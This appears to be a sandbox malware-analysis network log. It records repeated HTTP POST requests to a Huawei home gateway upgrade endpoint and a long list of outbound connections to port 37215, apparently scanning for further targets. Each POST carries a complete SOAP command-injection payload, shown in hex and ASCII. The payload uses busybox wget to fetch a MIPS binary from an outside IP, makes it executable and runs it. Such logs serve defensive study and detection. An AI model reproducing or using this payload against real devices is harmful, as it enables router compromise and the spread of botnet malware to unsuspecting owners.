Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.164.30.159:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.240.211.158:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.79.193.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.50.71.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.131.179.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.242.158.111:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.108.55.243:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.202.220.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.33.200.202:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.162.167.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.188.170.72:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.28.48.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.182.186.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.94.135.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.165.152.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.182.255.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.8.170.178:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.136.61.104:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.23.193.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.221.98.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.44.192.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.142.142.86:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.141.164.240:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.59.55.108:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.206.57.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.131.178.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.206.93.219:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.222.170.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.42.8.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.9.201.133:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.251.253.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.16.99.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.82.143.222:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.212.17.133:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.250.96.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.183.7.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.247.22.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.51.200.209:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.153.58.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.222.183.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.216.3.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.212.28.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.246.116.86:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.125.40.72:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.227.254.179:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.216.59.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.67.116.109:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.44.62.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.54.3.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.148.202.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.239.178.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.244.21.84:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.88.51.58:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.100.72.139:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.207.218.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.88.30.209:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.145.154.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.147.132.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.90.160.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.200.106.38:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.244.7.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.76.96.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.206.43.243:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.175.8.86:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.5.153.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.193.195.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.19.132.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.67.163.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.80.180.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.48.132.6:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.113.52.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.15.78.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.127.87.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.69.208.6:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.175.81.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.214.179.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.222.121.155:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.105.117.122:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.57.0.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 41.241.175.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 197.128.217.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:58349 -> 156.133.254.240:37215
